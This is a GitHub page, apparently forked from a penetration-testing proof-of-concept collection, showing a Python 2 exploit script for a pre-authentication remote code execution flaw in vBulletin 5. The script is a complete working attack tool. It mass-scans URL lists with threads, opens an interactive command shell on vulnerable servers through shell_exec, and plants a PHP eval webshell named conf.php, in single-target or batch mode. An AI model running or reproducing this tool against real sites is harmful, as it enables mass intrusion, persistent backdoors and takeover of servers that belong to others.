forked from Mr-xn/Penetration_Testing_POC
-
Notifications
You must be signed in to change notification settings - Fork 1
/
vbulletin5-rce.py
297 lines (204 loc) · 8.87 KB
/
vbulletin5-rce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
```python
# coding:utf-8
# Author:LSA
# Description:vbulletin 5 rce
# Date:20190927
# vbulletin5-rce利用工具(批量检测/getshell)
import requests
import sys
import optparse
import threading
import datetime
import os
import Queue
import urllib3
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
reload(sys)
sys.setdefaultencoding('utf-8')
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
}
params = {"routestring":"ajax/render/widget_php"}
lock = threading.Lock()
q0 = Queue.Queue()
threadList = []
global succ
succ = 0
def checkVbulletin5Rce(tgtUrl,timeout):
cmd = 'echo fe0a612646c36e7f89b5b81f8f141d3d' #md5(check-vbulletin5-rce)
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
rsp = requests.post(tgtUrl,headers=headers,verify=False, data=params,timeout=timeout)
#print rsp.text.encode('utf-8')
if rsp.status_code == 200 and ("fe0a612646c36e7f89b5b81f8f141d3d" in rsp.text.encode('utf-8')):
return True
#print 'Target is vulnerable!!!' + '\n'
else:
return False
#print 'Target is not vulnerable.' + '\n'
def checkVbulletin5RceBatch(timeout, f4success):
urllib3.disable_warnings()
cmd = 'echo fe0a612646c36e7f89b5b81f8f141d3d' # md5(check-vbulletin5-rce)
params["widgetConfig[code]"] = "echo shell_exec('" + cmd + "'); exit;"
global countLines
while (not q0.empty()):
tgtUrl = q0.get()
qcount = q0.qsize()
print 'Checking: ' + tgtUrl + ' ---[' + str(countLines - qcount) + '/' + str(countLines) + ']'
try:
rst = requests.post(tgtUrl, headers=headers, data=params,timeout=timeout, verify=False)
except requests.exceptions.Timeout:
continue
except requests.exceptions.ConnectionError:
continue
except:
continue
if rst.status_code == 200 and ("fe0a612646c36e7f89b5b81f8f141d3d" in rst.text.encode('utf-8')):
print 'Target is vulnerable!!!--- ' + tgtUrl + '\n'
lock.acquire()
f4success.write('Target is vulnerable!!!---' + tgtUrl + '\n')
lock.release()
global succ
succ = succ + 1
else:
continue
def getCmdShellVbulletin5Rce(tgtUrl,timeout):
#pass
while True:
cmd = raw_input("cmd>>> ")
if cmd == 'exit':
break
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
cmdResult = requests.post(tgtUrl,headers=headers,verify=False, data=params,timeout=timeout)
print cmdResult.text.encode('utf-8')
def vbulletin5RceGetshell(tgtUrl,timeout):
exp = 'file_put_contents(\'conf.php\',urldecode(\'%3c%3fphp%20@eval(%24_%50%4f%53%54%5b%22x%22%5d)%3b%3f%3e\')); exit;'
#cmd = 'echo '
#params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
params["widgetConfig[code]"] = exp
rsp = requests.post(tgtUrl, headers=headers, verify=False, data=params, timeout=timeout)
# print rsp.text.encode('utf-8')
if rsp.status_code == 200:
rsp1 = requests.get(tgtUrl+'/conf.php',verify=False,timeout=timeout)
print rsp1.status_code
print tgtUrl + '/conf.php'
if rsp1.status_code == 200:
print 'Getshell successed!!!Shell addr:' + tgtUrl + '/conf.php:x'
else:
print 'Getshell failed.'
else:
print 'rsp something error.'
def vbulletin5RceGetshellBatch(timeout, f4success):
urllib3.disable_warnings()
exp = 'file_put_contents(\'conf.php\',urldecode(\'%3c%3fphp%20@eval(%24_%50%4f%53%54%5b%22x%22%5d)%3b%3f%3e\')); exit;'
params["widgetConfig[code]"] = exp
global countLines
while (not q0.empty()):
tgtUrl = q0.get()
qcount = q0.qsize()
print 'Checking: ' + tgtUrl + ' ---[' + str(countLines - qcount) + '/' + str(countLines) + ']'
try:
rst = requests.post(tgtUrl, headers=headers, data=params, timeout=timeout, verify=False)
except requests.exceptions.Timeout:
continue
except requests.exceptions.ConnectionError:
continue
except:
continue
if rst.status_code == 200:
rsp1 = requests.get(tgtUrl+'/conf.php',verify=False,timeout=timeout)
if rsp1.status_code == 200:
print 'Getshell successed!!!Shell addr:' + tgtUrl + '/conf.php:x' + '\n'
lock.acquire()
f4success.write('Getshell successed!!!Shell addr:' + tgtUrl + '/conf.php:x' + '\n')
lock.release()
global succ
succ = succ + 1
else:
continue
else:
continue
if __name__ == '__main__':
print '''
********************************
* vbulletin 5 pre auth rce *
* Coded by LSA *
********************************
'''
parser = optparse.OptionParser('python %prog ' + '-h (manual)', version='%prog v1.0')
parser.add_option('-u', dest='tgtUrl', type='string', help='single url')
parser.add_option('-f', dest='tgtUrlsPath', type='string', help='urls filepath[exploit default]')
parser.add_option('-s', dest='timeout', type='int', default=20, help='timeout(seconds)')
parser.add_option('-t', dest='threads', type='int', default=5, help='the number of threads')
# parser.add_option('--check', dest='check',action='store_true', help='check url but not exploit[default]')
parser.add_option('--getshell', dest='getshell',action='store_true', help='get webshell')
parser.add_option('--cmdshell', dest='cmdshell',action='store_true', help='cmd shell mode')
(options, args) = parser.parse_args()
# check = options.check
getshell = options.getshell
cmdshell = options.cmdshell
timeout = options.timeout
tgtUrl = options.tgtUrl
global countLines
countLines = 0
if tgtUrl and (cmdshell is None) and (getshell is None):
if(checkVbulletin5Rce(tgtUrl,timeout)):
print 'Target is vulnerable!!!' + '\n'
else:
print 'Target is not vulnerable.' + '\n'
if tgtUrl and cmdshell and (getshell is None):
if (checkVbulletin5Rce(tgtUrl,timeout)):
print 'Target is vulnerable!!! Entering cmdshell...' + '\n'
else:
print 'Target is not vulnerable.' + '\n'
sys.exit()
getCmdShellVbulletin5Rce(tgtUrl,timeout)
if tgtUrl and (cmdshell is None) and getshell:
vbulletin5RceGetshell(tgtUrl,timeout)
if options.tgtUrlsPath and (getshell is None):
tgtFilePath = options.tgtUrlsPath
threads = options.threads
nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
os.mkdir('batch_result/' + str(nowtime))
f4success = open('batch_result/' + str(nowtime) + '/' + 'success.txt', 'w')
# f4fail = open('batch_result/'+str(nowtime)+'/'+'fail.txt','w')
urlsFile = open(tgtFilePath)
countLines = len(open(tgtFilePath, 'rU').readlines())
print '===Total ' + str(countLines) + ' urls==='
for urls in urlsFile:
fullUrls = urls.strip()
q0.put(fullUrls)
for thread in range(threads):
t = threading.Thread(target=checkVbulletin5RceBatch, args=(timeout, f4success))
t.start()
threadList.append(t)
for th in threadList:
th.join()
print '\n###Finished! [success/total]: ' + '[' + str(succ) + '/' + str(countLines) + ']###'
print 'Results were saved in ./batch_result/' + str(nowtime) + '/'
f4success.close()
# f4fail.close()
if options.tgtUrlsPath and getshell:
tgtFilePath = options.tgtUrlsPath
threads = options.threads
nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
os.mkdir('batch_result/' + str(nowtime))
f4success = open('batch_result/' + str(nowtime) + '/' + 'success.txt', 'w')
# f4fail = open('batch_result/'+str(nowtime)+'/'+'fail.txt','w')
urlsFile = open(tgtFilePath)
countLines = len(open(tgtFilePath, 'rU').readlines())
print '===Total ' + str(countLines) + ' urls==='
for urls in urlsFile:
fullUrls = urls.strip()
q0.put(fullUrls)
for thread in range(threads):
t = threading.Thread(target=vbulletin5RceGetshellBatch, args=(timeout, f4success))
t.start()
threadList.append(t)
for th in threadList:
th.join()
print '\n###Finished! [success/total]: ' + '[' + str(succ) + '/' + str(countLines) + ']###'
print 'Results were saved in ./batch_result/' + str(nowtime) + '/'
f4success.close()
# f4fail.close()
```